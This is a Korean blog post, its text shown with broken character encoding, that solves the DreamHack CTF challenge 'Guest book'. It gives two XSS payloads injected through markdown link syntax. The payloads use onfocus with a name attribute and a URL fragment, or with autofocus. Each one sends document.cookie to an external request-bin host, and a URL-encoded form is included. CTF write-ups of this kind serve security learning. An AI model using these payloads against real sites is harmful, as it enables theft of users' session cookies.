๋ณธ๋ฌธ ๋ฐ”๋กœ๊ฐ€๊ธฐ
๐ŸดCTF/DreamHack

DreamHack - Guest book ํ’€์ด

by Janger 2023. 9. 7.
728x90
๋ฐ˜์‘ํ˜•

 

๋ฐฉ๋ฒ• 1. name๊ณผ onfocus ์‚ฌ์šฉ

 

[dreamhack](#' name='foo' onfocus='location.href=`https://bqfyoyg.request.dreamhack.games/cookie=`+document.cookie')

 

์œ„ ํ…์ŠคํŠธ๋ฅผ URL Encoding ํ•œ๋‹ค.

 

%5Bdreamhack%5D%28%23%27%20name%3D%27foo%27%20onfocus%3D%27location%2Ehref%3D%60https%3A%2F%2Fbqfyoyg%2Erequest%2Edreamhack%2Egames%2Fcookie%3D%60%2Bdocument%2Ecookie%27%29

 

์ธ์ฝ”๋”ฉ ๋œ ๊ฐ’์„ content ํŒŒ๋ผ๋ฏธํ„ฐ ๊ฐ’์œผ๋กœ ๊ฑด๋„ค์ฃผ๋Š”๋ฐ URL ๋’ค์— #foo๋ฅผ ํฌํ•จํ•˜๋Š” ๊ฒƒ์ด ํ•ต์‹ฌ

http://host3.dreamhack.games:13138/GuestBook.php?content={์ธ์ฝ”๋”ฉ๋œ ๋‚ด์šฉ}#foo

์œ„ ์ฃผ์†Œ๋กœ ๋“ค์–ด๊ฐ€๊ฒŒ ๋˜๋ฉด a ํƒœ๊ทธ๊ฐ€ ์ž๋™์œผ๋กœ focus ๋˜๋ฉด์„œ ๊ณต๊ฒฉ์ž์˜ ์›น ํ›…์œผ๋กœ request๋ฅผ ํ•˜๊ฒŒ ๋œ๋‹ค.

 

 

 

๋ฐฉ๋ฒ• 2. autofocus์™€ onfocus ์‚ฌ์šฉ

 

[dreamhack](#' autofocus onfocus='location.href=`https://bqfyoyg.request.dreamhack.games/cookie=`+document.cookie')

 

์ด๊ฑด ๋‹ค๋ฅธ ํ’€์ด ๋ฌธ์ œ์—์„œ ์ฐพ์€ ๋ฐฉ๋ฒ•์ด๋‹ค. URL ๋’ค์— fragment๋ฅผ ์ž‘์„ฑํ•˜์ง€ ์•Š์•„๋„ (๋ฐฉ๋ฒ• 1)ํ•˜๊ณ  ๊ฒฐ๊ณผ๊ฐ€ ๊ฐ™๋‹ค. 

 

Reference

 

https://security.stackexchange.com/questions/168909/xss-inside-anchor-tag-a-without-user-interaction

 

XSS inside anchor tag (<a>) without user interaction?

Is it possible to inject a payload inside <a> tag such that the script runs without user interaction? The injection is inside the href attribute. I can inject onmouseover or onclick attribut...

security.stackexchange.com

 

728x90
๋ฐ˜์‘ํ˜•

'๐ŸดCTF > DreamHack' ์นดํ…Œ๊ณ ๋ฆฌ์˜ ๋‹ค๋ฅธ ๊ธ€

DreamHack - out_of_boundary ํ’€์ด  (0) 2023.09.08
DreamHack - Guest book v0.2 ํ’€์ด  (0) 2023.09.07
DreamHack - CTF์— ์œ ์šฉํ•œ ๋„๊ตฌ ๋ชจ์Œ(๋“œ๋ฆผํ•ต ํˆด์ฆˆ)  (0) 2023.09.07
DreamHack - blind-command ํ’€์ด  (0) 2023.09.07
DreamHack - Robot Only ํ’€์ด  (0) 2023.05.24

๊ด€๋ จ๊ธ€

ํ‹ฐ์Šคํ† ๋ฆฌํˆด๋ฐ”